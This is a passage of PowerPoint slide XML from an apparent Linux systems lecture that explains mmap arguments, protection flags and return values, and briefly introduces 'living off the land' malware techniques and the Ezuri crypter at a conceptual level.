            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Usage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12760652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6"/>
            <a:ext cx="8496944" cy="3705861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If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dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, then the kernel chooses the (page-aligned) address at which to create the mapping; this is the most portable method of creating a new mapping. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, then the kernel takes it as a hint about where to place the mapping; on Linux, the kernel will pick a nearby page boundary (but always above or equal to the value specified by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/sys/</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vm</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mmap_min_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) and attempt to create the mapping there. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>another mapping already exists there, the kernel picks a new address that may or may not depend on the hint.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78</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Argument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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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11996212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6"/>
            <a:ext cx="7732381" cy="3849877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The contents of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>file mapping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(as opposed to an anonymous mapping; see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MAP_ANONYMOUS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>below), are initialized using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> bytes starting at offset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offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in the file (or other object) referred to by the file descriptor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dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>must be a multiple of the page size as returned by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sysconf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>(</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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SC_PAGE_SIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>After </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>has returned, the file descriptor,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dirty="0"/>
              <a:t>, can be closed immediately without invalidating the mapping.</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79</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>File Mapping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172245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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4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1230288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2420888"/>
            <a:ext cx="8928991" cy="4104456"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The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prot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> argument describes the desired memory protection of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the mapping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(and must not conflict with the open mode of the file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PROT_NONE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bitwise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>OR of one or more of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>following flags:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>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PROT_EXEC</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Pages may be executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0"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a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PROT_READ</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Pages may be read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0"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a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PROT_WRITE</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Pages may be written.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PROT_NONE</a:t>
            </a:r>
          </a:p>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              Pages may not be accessed.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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80</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Argument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202489750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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> argument determines whether updates to the mapping are visible to other processes mapping the same region, and whether updates are carried through to the underlying file. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>behavior is determined by including exactly one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>values in </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flags</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81</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Argument </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404565852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496944" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>On success,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returns a pointer to the mapped area. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>error, the value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MAP_FAILED (that is, (void *) -</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1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is returned, and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errno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is set to indicate the error. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>success,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munmap</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t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>failure, it returns -1, and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errno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is set to indicate the error (probably to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EINVAL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>).</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82</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Return Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>man7.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217662359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term “living off the land” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>LOL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) was coined by malware researchers Christopher Campbell and Matt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Greaber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to explain the use of trusted, pre-installed system tools to spread malware. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>are a few different types of LOL techniques, including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LOLBins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Windows binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to hide malicious activity; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LOLLibs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which use libraries; and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LOLScripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which use scripts.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>What Is “Living off the Land</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>       [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Yiftach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Keshet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
            </a:b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83</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6432567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標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="338328"/>
            <a:ext cx="8640960" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Malware Authors Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" err="1"/>
              <a:t>Ezuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" err="1"/>
              <a:t>Golang</a:t>
            </a:r>
